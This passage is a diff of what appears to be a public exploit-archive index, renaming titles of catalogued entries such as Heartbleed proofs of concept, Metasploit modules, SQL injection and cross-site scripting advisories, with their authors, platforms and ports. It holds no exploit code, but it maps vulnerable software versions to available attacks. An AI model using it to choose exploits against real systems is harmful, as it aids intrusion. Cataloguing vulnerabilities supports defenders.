Hat",jsp,webapps,0 32743,platforms/hardware/remote/32743.txt,"Halon Security Router (SR) 3.2-winter-r1 - Multiple Security Vulnerabilities",2014-04-08,"Juan Manuel Garcia",hardware,remote,0 -32745,platforms/multiple/remote/32745.py,"OpenSSL TLS Heartbeat Extension - Memory Disclosure",2014-04-08,"Jared Stafford",multiple,remote,443 +32745,platforms/multiple/remote/32745.py,"OpenSSL TLS Heartbeat Extension - ''Heartbleed' Memory Disclosure",2014-04-08,"Jared Stafford",multiple,remote,443 32746,platforms/cgi/webapps/32746.txt,"MoinMoin 1.8 - 'AttachFile.py' Cross-Site Scripting",2009-01-20,SecureState,cgi,webapps,0 32747,platforms/php/webapps/32747.txt,"PHP-Nuke Downloads Module - 'url' Parameter SQL Injection",2009-01-23,"Sina Yazdanmehr",php,webapps,0 32748,platforms/asp/webapps/32748.txt,"BBSXP 5.13 - 'error.asp' Cross-Site Scripting",2009-01-23,arashps0,asp,webapps,0 @@ -29613,7 +29613,7 @@ id,file,description,date,author,platform,type,port 32760,platforms/php/webapps/32760.txt,"NewsCMSLite - Insecure Cookie Authentication Bypass",2009-01-24,FarhadKey,php,webapps,0 32761,platforms/windows/dos/32761.pl,"Apple Safari For Windows 3.2.1 - Malformed URI Remote Denial Of Service",2009-01-27,Lostmon,windows,dos,0 32762,platforms/multiple/remote/32762.pl,"Sun Java System Access Manager 7.1 - 'Username' Enumeration",2009-01-27,"Marco Mella",multiple,remote,0 -32764,platforms/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)",2014-04-09,"Fitzl Csaba",multiple,remote,443 +32764,platforms/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL/TLS versions)",2014-04-09,"Fitzl Csaba",multiple,remote,443 32765,platforms/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,multiple,webapps,0 32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek - 'cs.html' URI redirection",2009-01-28,buzzy,php,webapps,0 32767,platforms/php/webapps/32767.txt,"Quick.CMS 5.4 - Multiple Vulnerabilities",2014-04-09,"Shpend Kurtishaj",php,webapps,0 @@ -29639,7 +29639,7 @@ id,file,description,date,author,platform,type,port 33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 - 'login.php' goto Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 32789,platforms/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface - Authenticated Arbitrary Command Execution (Metasploit)",2014-04-10,Metasploit,unix,remote,443 32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - Cross-Site Request Forgery",2014-04-10,"High-Tech Bridge SA",php,webapps,80 -32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL - Information Leak Exploit (1)",2014-04-10,prdelka,multiple,remote,443 +32791,platforms/multiple/remote/32791.c,"OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak Exploit (1)",2014-04-10,prdelka,multiple,remote,443 32792,platforms/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80 32793,platforms/windows/local/32793.rb,"Microsoft Word - RTF Object Confusion (MS14-017)",2014-04-10,Metasploit,windows,local,0 32794,platforms/php/remote/32794.rb,"Vtiger - Install Unauthenticated Remote Command Execution (Metasploit)",2014-04-10,Metasploit,php,remote,80 @@ -29692,7 +29692,7 @@ id,file,description,date,author,platform,type,port 32842,platforms/php/webapps/32842.txt,"UMI CMS 2.7 - 'fields_filter' Parameter Cross-Site Scripting",2009-03-06,"Dmitriy Evteev",php,webapps,0 32843,platforms/php/webapps/32843.txt,"TinXCMS 3.5 - 'rss.php' SQL Injection",2009-03-06,"Dmitriy Evteev",php,webapps,0 32844,platforms/php/webapps/32844.txt,"PHORTAIL 1.2.1 - 'poster.php' Multiple HTML Injection Vulnerabilities",2009-03-09,"Jonathan Salwan",php,webapps,0 -32845,platforms/windows/local/32845.pl,"IBM Director 5.20 - CIM Server Privilege Escalation",2009-03-10,"Bernhard Mueller",windows,local,0 +32845,platforms/windows/local/32845.pl,"IBM System Director Agent 5.20 - CIM Server Privilege Escalation",2009-03-10,"Bernhard Mueller",windows,local,0 32846,platforms/php/webapps/32846.txt,"Nenriki CMS 0.5 - 'ID' Cookie SQL Injection",2009-03-10,x0r,php,webapps,0 32847,platforms/multiple/local/32847.txt,"PostgreSQL 8.3.6 - Low Cost Function Information Disclosure",2009-03-10,"Andres Freund",multiple,local,0 32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 - Privilege Escalation",2009-03-10,"Sun Microsystems",linux,local,0 @@ -29758,7 +29758,7 @@ id,file,description,date,author,platform,type,port 32912,platforms/php/webapps/32912.txt,"Phorum 5.2 - admin/users.php Multiple Parameter Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps,0 32913,platforms/php/webapps/32913.txt,"Phorum 5.2 - versioncheck.php upgrade_available Parameter Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps,0 32914,platforms/php/webapps/32914.php,"Geeklog 1.5.2 - 'usersettings.php' SQL Injection",2009-04-16,Nine:Situations:Group::bookoo,php,webapps,0 -32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0 +32998,platforms/multiple/remote/32998.c,"OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak Exploit (2) (DTLS Support)",2014-04-24,"Ayman Sagy",multiple,remote,0 32997,platforms/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote,0 32919,platforms/hardware/remote/32919.txt,"SAP Router - Timing Attack Password Disclosure",2014-04-17,"Core Security",hardware,remote,0 32920,platforms/multiple/remote/32920.txt,"Apache Geronimo 2.1.x - /console/portal/Server/Monitoring Multiple Parameter Cross-Site Scripting",2009-04-16,DSecRG,multiple,remote,0 @@ -29868,7 +29868,7 @@ id,file,description,date,author,platform,type,port 33024,platforms/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure",2009-06-09,"Jorge Luis Alvarez Medina",windows,remote,0 33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 - 'cfgadvanced.html' HTTP Header Injection",2009-06-05,Inferno,windows,remote,0 33026,platforms/ios/webapps/33026.txt,"Depot WiFi 1.0.0 iOS - Multiple Vulnerabilities",2014-04-25,Vulnerability-Lab,ios,webapps,0 -33027,platforms/windows/remote/33027.py,"Kolibri 2.0 - GET Request Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80 +33027,platforms/windows/remote/33027.py,"Kolibri Web Server 2.0 - GET Request Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80 33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0 33030,platforms/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities",2014-04-26,JIKO,php,webapps,0 33031,platforms/linux/dos/33031.html,"Mozilla Firefox 3.0.x - Large GIF File Background Denial of Service",2009-05-10,"Ahmad Muammar",linux,dos,0 @@ -30158,7 +30158,7 @@ id,file,description,date,author,platform,type,port 33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service",2010-02-02,"Marcelo Tosatti",linux,dos,0 33593,platforms/windows/local/33593.c,"Microsoft Windows 2000/XP/2003/Vista - Double-Free Memory Corruption Privilege Escalation",2010-02-09,"Tavis Ormandy",windows,local,0 33594,platforms/windows/remote/33594.txt,"Microsoft Windows Vista/2008 - ICMPv6 Router Advertisement Remote Code Execution",2010-02-09,"Sumit Gwalani",windows,remote,0 -33326,platforms/windows/remote/33326.py,"Easy Chat Server 3.1 - Stack Buffer Overflow",2014-05-12,superkojiman,windows,remote,0 +33326,platforms/windows/remote/33326.py,"EFS Easy Chat Server 3.1 - Stack Buffer Overflow",2014-05-12,superkojiman,windows,remote,0 33327,platforms/hardware/webapps/33327.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Information Disclosure",2014-05-12,"Luigi Vezzoso",hardware,webapps,0 33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Denial Of Service Issue",2014-05-12,"Luigi Vezzoso",hardware,dos,0 33341,platforms/php/webapps/33341.txt,"CuteNews 1.4.6 - search.php from_date_day Parameter Full Path Disclosure",2009-11-10,"Andrew Horton",php,webapps,0 @@ -30759,7 +30759,7 @@ id,file,description,date,author,platform,type,port 34062,platforms/php/webapps/34062.txt,"Shopizer 1.1.5 - Multiple Vulnerabilities",2014-07-14,"SEC Consult",php,webapps,80 34037,platforms/win_x86/local/34037.txt,"OpenVPN Private Tunnel Core Service - Unquoted Service Path Elevation Of Privilege",2014-07-12,LiquidWorm,win_x86,local,0 34038,platforms/php/webapps/34038.txt,"Aerohive HiveOS 5.1r5 < 6.1r5 - Multiple Vulnerabilities",2014-07-12,DearBytes,php,webapps,0 -34189,platforms/php/webapps/34189.txt,"Sphider 1.3.6 - Multiple Vulnerabilities",2014-07-28,"Mike Manzotti",php,webapps,80 +34189,platforms/php/webapps/34189.txt,"Sphider Search Engine 1.3.6 - Multiple Vulnerabilities",2014-07-28,"Mike Manzotti",php,webapps,80 34040,platforms/php/webapps/34040.txt,"RazorCMS 1.0 - 'admin/index.php' HTML Injection",2010-05-24,"High-Tech Bridge SA",php,webapps,0 34041,platforms/php/webapps/34041.txt,"Getsimple CMS 2.01 - 'components.php' Cross-Site Scripting",2010-05-24,"High-Tech Bridge SA",php,webapps,0 34042,platforms/php/webapps/34042.txt,"Ruubikcms 1.0.3 - 'index.php' Cross-Site Scripting",2010-05-24,"High-Tech Bridge SA",php,webapps,0 @@ -30779,7 +30779,7 @@ id,file,description,date,author,platform,type,port 34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x - Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0 34057,platforms/php/webapps/34057.txt,"wsCMS - 'news.php' Cross-Site Scripting",2010-05-31,cyberlog,php,webapps,0 34058,platforms/multiple/dos/34058.txt,"DM Database Server - 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0 -34059,platforms/windows/remote/34059.py,"Kolibri WebServer 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0 +34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0 34060,platforms/lin_x86/shellcode/34060.c,"Linux/x86 - Socket Re-use Shellcode (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0 34063,platforms/hardware/remote/34063.rb,"D-Link - info.cgi POST Request Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80 34064,platforms/hardware/remote/34064.rb,"D-Link HNAP - Request Remote Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80 @@ -30867,7 +30867,7 @@ id,file,description,date,author,platform,type,port 34164,platforms/linux/dos/34164.pl,"Make 3.81 - Heap Overflow (PoC)",2014-07-24,HyP,linux,dos,0 34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",multiple,webapps,0 34166,platforms/php/webapps/34166.txt,"KubeSupport - 'lang' Parameter SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 -34167,platforms/win_x86/local/34167.rb,"MQAC.sys - Arbitrary Write Privilege Escalation (Metasploit)",2014-07-25,Metasploit,win_x86,local,0 +34167,platforms/win_x86/local/34167.rb,"Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation (Metasploit)",2014-07-25,Metasploit,win_x86,local,0 34168,platforms/php/webapps/34168.py,"Pligg 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80 34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent Cross-Site Scripting",2014-07-27,"Osanda Malith",php,webapps,0 34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting",2014-07-27,"Mayuresh Dani",php,webapps,0 @@ -31022,8 +31022,8 @@ id,file,description,date,author,platform,type,port 34324,platforms/php/webapps/34324.txt,"FestOS 2.3 - 'contents' Parameter Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34499,platforms/php/webapps/34499.txt,"ViArt Helpdesk - products_search.php search_category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34335,platforms/linux/remote/34335.rb,"VMTurbo Operations Manager 4.6 - vmtadmin.cgi Remote Command Execution (Metasploit)",2014-08-14,Metasploit,linux,remote,80 -34334,platforms/win_x86-64/remote/34334.rb,"VirtualBox - 3D Acceleration Virtual Machine Escape (Metasploit)",2014-08-14,Metasploit,win_x86-64,remote,0 -34333,platforms/windows/local/34333.rb,"VirtualBox Guest Additions - 'VBoxGuest.sys' Privilege Escalation (Metasploit)",2014-08-13,Metasploit,windows,local,0 +34334,platforms/win_x86-64/remote/34334.rb,"Oracle VM VirtualBox 4.3.6 - 3D Acceleration Virtual Machine Escape (Metasploit)",2014-08-14,Metasploit,win_x86-64,remote,0 +34333,platforms/windows/local/34333.rb,"Oracle VM VirtualBox Guest Additions 4.3.10r93012 - 'VBoxGuest.sys' Privilege Escalation (Metasploit)",2014-08-13,Metasploit,windows,local,0 34331,platforms/windows/local/34331.py,"BlazeDVD Pro 7.0 - '.plf' Stack Based Buffer Overflow (Direct RET)",2014-08-12,"Giovanni Bartolomucci",windows,local,0 34343,platforms/asp/webapps/34343.txt,"MOJO IWms 7 - 'default.asp' Cookie Manipulation",2007-12-17,"cp77fk4r ",asp,webapps,0 34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET - Multiple SQL Injections",2009-12-17,bi0,asp,webapps,0 @@ -31069,7 +31069,7 @@ id,file,description,date,author,platform,type,port 34386,platforms/php/webapps/34386.txt,"Cetera eCommerce - Multiple SQL Injections",2010-07-28,MustLive,php,webapps,0 34387,platforms/php/webapps/34387.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2010-07-28,MustLive,php,webapps,0 34388,platforms/php/webapps/34388.txt,"SPIP 2.1 - 'var_login' Parameter Cross-Site Scripting",2010-07-28,dotsafe.fr,php,webapps,0 -34389,platforms/php/webapps/34389.txt,"Impact Software Ad Peeps - Cross-Site Scripting / HTML Injection",2010-07-27,Matt,php,webapps,0 +34389,platforms/php/webapps/34389.txt,"Impact Software AdPeeps - Cross-Site Scripting / HTML Injection",2010-07-27,Matt,php,webapps,0 34390,platforms/php/remote/34390.rb,"HybridAuth - install.php PHP Code Execution (Metasploit)",2014-08-21,Metasploit,php,remote,80 34391,platforms/php/webapps/34391.txt,"Sourcefabric Campsite - Multiple Cross-Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps,0 34392,platforms/php/webapps/34392.txt,"MyIT CRM - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0 @@ -31164,7 +31164,7 @@ id,file,description,date,author,platform,type,port 34487,platforms/php/webapps/34487.txt,"Facil Helpdesk - kbase/kbase.php URI Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 34489,platforms/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow (SEH)",2014-08-31,mr.pr0n,windows,local,0 34492,platforms/asp/webapps/34492.txt,"Online Work Order Suite Lite Edition - Multiple Cross-Site Scripting Vulnerabilities",2009-08-10,Moudi,asp,webapps,0 -34493,platforms/php/webapps/34493.txt,"PPScript - 'shop.htm' SQL Injection",2009-08-03,MizoZ,php,webapps,0 +34493,platforms/php/webapps/34493.txt,"Payment Processor Script (PPScript) - 'shop.htm' SQL Injection",2009-08-03,MizoZ,php,webapps,0 34494,platforms/php/webapps/34494.txt,"ViArt Helpdesk - products.php category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34495,platforms/php/webapps/34495.txt,"ViArt Helpdesk - article.php category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34496,platforms/php/webapps/34496.txt,"ViArt Helpdesk - product_details.php category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 @@ -31183,7 +31183,7 @@ id,file,description,date,author,platform,type,port 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting",2014-09-01,"Prakhar Prasad",multiple,webapps,0 34514,platforms/php/webapps/34514.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 34517,platforms/windows/remote/34517.rb,"Wing FTP Server - Authenticated Command Execution (Metasploit)",2014-09-01,Metasploit,windows,remote,5466 -34518,platforms/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",jsp,webapps,0 +34518,platforms/jsp/webapps/34518.txt,"ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",jsp,webapps,0 34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400 35592,platforms/windows/dos/35592.py,"jetAudio 8.1.3 Basic (mp3) - Crash (PoC)",2014-12-23,"Drozdova Liudmila",windows,dos,0 34520,platforms/linux/dos/34520.txt,"Oracle MySQL 5.1.48 - 'HANDLER' Interface Denial Of Service",2010-08-20,"Matthias Leich",linux,dos,0 @@ -31665,7 +31665,7 @@ id,file,description,date,author,platform,type,port 35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server - Directory Traversal",2010-12-06,Pr0T3cT10n,windows,remote,0 35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion",2014-10-25,"Parvinder Bhasin",php,webapps,0 35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 -35055,platforms/windows/remote/35055.py,"Microsoft Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0 +35055,platforms/windows/remote/35055.py,"Microsoft Windows - OLE Remote Code Execution 'Sandworm' Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0 35057,platforms/php/webapps/35057.py,"WordPress Plugin 0.9.7 / Joomla! Component 2.0.0 Creative Contact Form - Arbitrary File Upload",2014-10-25,"Claudio Viviani",php,webapps,0 35058,platforms/bsd/dos/35058.c,"OpenBSD 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0 @@ -31847,7 +31847,7 @@ id,file,description,date,author,platform,type,port 35239,platforms/php/webapps/35239.txt,"phpCMS 2008 V2 - 'data.php' SQL Injection",2011-01-17,R3d-D3V!L,php,webapps,0 35240,platforms/linux/dos/35240.c,"acpid 1.0.x - Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",linux,dos,0 35241,platforms/windows/remote/35241.pl,"ESTsoft ALZip 8.12.0.3 - '.zip' Buffer Overflow",2011-01-19,"C4SS!0 G0M3S",windows,remote,0 -35242,platforms/multiple/remote/35242.txt,"Eclipse 3.3.2 IDE Help Server - help/advanced/searchView.jsp SearchWord Parameter Cross-Site Scripting",2008-04-24,Rob,multiple,remote,0 +35242,platforms/multiple/remote/35242.txt,"Eclipse 3.3.2 IDE - Help Server help/advanced/searchView.jsp SearchWord Parameter Cross-Site Scripting",2008-04-24,Rob,multiple,remote,0 35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE - Help Server help/advanced/workingSetManager.jsp workingSet Parameter Cross-Site Scripting",2008-04-24,Rob,multiple,remote,0 35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 - Malformed Message Denial Of Service",2011-01-19,"Craig Freyman",windows,dos,0 35245,platforms/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0 @@ -31928,9 +31928,9 @@ id,file,description,date,author,platform,type,port 35333,platforms/php/webapps/35333.py,"webERP 4.0.1 - 'InputSerialItemsFile.php' Arbitrary File Upload",2011-02-10,"AutoSec Tools",php,webapps,0 35334,platforms/php/webapps/35334.txt,"RunCMS 2.2.2 - 'register.php' SQL Injection",2011-02-10,"High-Tech Bridge SA",php,webapps,0 35335,platforms/php/webapps/35335.html,"Drupal Module CAPTCHA - Security Bypass",2011-02-11,anonymous,php,webapps,0 -35336,platforms/php/webapps/35336.txt,"TaskFreak 0.6.4 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps,0 -35337,platforms/php/webapps/35337.txt,"TaskFreak 0.6.4 - print_list.php Multiple Parameter Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps,0 -35338,platforms/php/webapps/35338.txt,"TaskFreak 0.6.4 - rss.php HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps,0 +35336,platforms/php/webapps/35336.txt,"TaskFreak! 0.6.4 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps,0 +35337,platforms/php/webapps/35337.txt,"TaskFreak! 0.6.4 - print_list.php Multiple Parameter Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps,0 +35338,platforms/php/webapps/35338.txt,"TaskFreak! 0.6.4 - rss.php HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps,0 35339,platforms/multiple/dos/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - Denial of Service (Resource Consumption)",2014-11-24,CovertCodes,multiple,dos,0 35340,platforms/php/webapps/35340.txt,"WordPress Plugin wpDataTables 1.5.3 - SQL Injection",2014-11-24,"Claudio Viviani",php,webapps,0 35341,platforms/php/webapps/35341.py,"WordPress Plugin wpDataTables 1.5.3 - Unauthenticated Arbitrary File Upload",2014-11-24,"Claudio Viviani",php,webapps,0 @@ -32128,7 +32128,7 @@ id,file,description,date,author,platform,type,port 35563,platforms/windows/remote/35563.pl,"EasyPHP 5.3.5.0 - 'index.php' Arbitrary File Download",2011-04-03,KedAns-Dz,windows,remote,0 35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0 35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP router SVG6000RW - Privilege Escalation / Command Execution",2014-12-17,Chako,hardware,webapps,0 -35543,platforms/php/webapps/35543.txt,"WordPress Plugin Wp Symposium 14.11 - Unauthenticated Arbitrary File Upload",2014-12-15,"Claudio Viviani",php,webapps,0 +35543,platforms/php/webapps/35543.txt,"WordPress Plugin WP Symposium 14.11 - Unauthenticated Arbitrary File Upload",2014-12-15,"Claudio Viviani",php,webapps,0 35549,platforms/unix/remote/35549.rb,"ActualAnalyzer - 'ant' Cookie Command Execution (Metasploit)",2014-12-16,Metasploit,unix,remote,80 35545,platforms/php/remote/35545.rb,"Tuleap - PHP Unserialize Code Execution (Metasploit)",2014-12-15,Metasploit,php,remote,80 35547,platforms/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' Parameter SQL Injection",2011-03-30,RoAd_KiLlEr,php,webapps,0 @@ -32283,7 +32283,7 @@ id,file,description,date,author,platform,type,port 35728,platforms/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps,0 35729,platforms/multiple/remote/35729.txt,"Imperva SecureSphere - SQL Query Filter Security Bypass",2011-05-09,@drk1wi,multiple,remote,0 35730,platforms/php/webapps/35730.txt,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",php,webapps,80 -35731,platforms/php/remote/35731.rb,"Pandora 3.1 - Authentication Bypass / Arbitrary File Upload (Metasploit)",2015-01-08,Metasploit,php,remote,80 +35731,platforms/php/remote/35731.rb,"Pandora FMS 3.1 - Authentication Bypass / Arbitrary File Upload (Metasploit)",2015-01-08,Metasploit,php,remote,80 35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0 35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion / SQL Injection / Cross-Site Scripting",2015-01-09,Technidev,php,webapps,80 35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 - 'nick' Parameter SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 @@ -32329,7 +32329,7 @@ id,file,description,date,author,platform,type,port 35774,platforms/osx/dos/35774.c,"Apple Mac OSX 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 35775,platforms/ios/webapps/35775.txt,"Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities",2015-01-13,Vulnerability-Lab,ios,webapps,8888 35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise - Arbitrary File Upload (Metasploit)",2015-01-13,Metasploit,java,remote,9788 -35777,platforms/windows/remote/35777.rb,"Oracle MySQL for Microsoft Windows - FILE Privilege Abuse (Metasploit)",2015-01-13,Metasploit,windows,remote,0 +35777,platforms/windows/remote/35777.rb,"Oracle MySQL (Windows) - FILE Privilege Abuse (Metasploit)",2015-01-13,Metasploit,windows,remote,0 35778,platforms/php/remote/35778.rb,"WordPress Plugin WP Symposium 14.11 - Arbitrary File Upload (Metasploit)",2015-01-13,Metasploit,php,remote,80 35779,platforms/hardware/remote/35779.txt,"CiscoWorks Common Services Framework 3.1.1 Help Servlet - Cross-Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 35780,platforms/hardware/remote/35780.txt,"Cisco Unified Operations Manager 8.5 - Common Services Device Center Cross-Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 @@ -32508,7 +32508,7 @@ id,file,description,date,author,platform,type,port 35948,platforms/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - (ASLR + DEP Bypass)",2015-01-30,Rh0,windows,remote,0 35949,platforms/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",2015-01-30,"Paul Craig",windows,remote,0 35950,platforms/php/webapps/35950.txt,"NPDS CMS REvolution-13 - SQL Injection",2015-01-24,"Narendra Bhati",php,webapps,80 -35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 glibc gethostbyname - Denial of Service",2015-01-29,1n3,linux,dos,0 +35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 - glibc gethostbyname Denial of Service",2015-01-29,1n3,linux,dos,0 35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox - 'id' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0 35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0 35955,platforms/php/webapps/35955.txt,"Easy Estate Rental - 's_location' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0 @@ -32519,7 +32519,7 @@ id,file,description,date,author,platform,type,port 35960,platforms/php/webapps/35960.txt,"Joomla! Component Controller - 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0 35961,platforms/hp-ux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",hp-ux,remote,0 35962,platforms/windows/local/35962.c,"Trend Micro Multiple Products 8.0.1133 - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0 -35987,platforms/php/webapps/35987.txt,"Support Incident Tracker - (SiT!) 3.63 p1 search.php search_string Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 +35987,platforms/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 - search.php search_string Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 35964,platforms/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local,0 35965,platforms/php/webapps/35965.txt,"Joomla! Component com_resman - Cross-Site Scripting",2011-07-15,SOLVER,php,webapps,0 35966,platforms/php/webapps/35966.txt,"Joomla! Component com_newssearch - SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0 @@ -32872,13 +32872,13 @@ id,file,description,date,author,platform,type,port 36348,platforms/php/webapps/36348.txt,"Pro Clan Manager 0.4.2 - SQL Injection",2011-11-23,anonymous,php,webapps,0 36349,platforms/php/webapps/36349.txt,"AdaptCMS 2.0 - SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 36350,platforms/php/webapps/36350.txt,"Balitbang CMS 3.3 - 'index.php' hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 -36351,platforms/php/webapps/36351.txt,"alitbang CMS 3.3 - alumni.php hal Parameter SQL 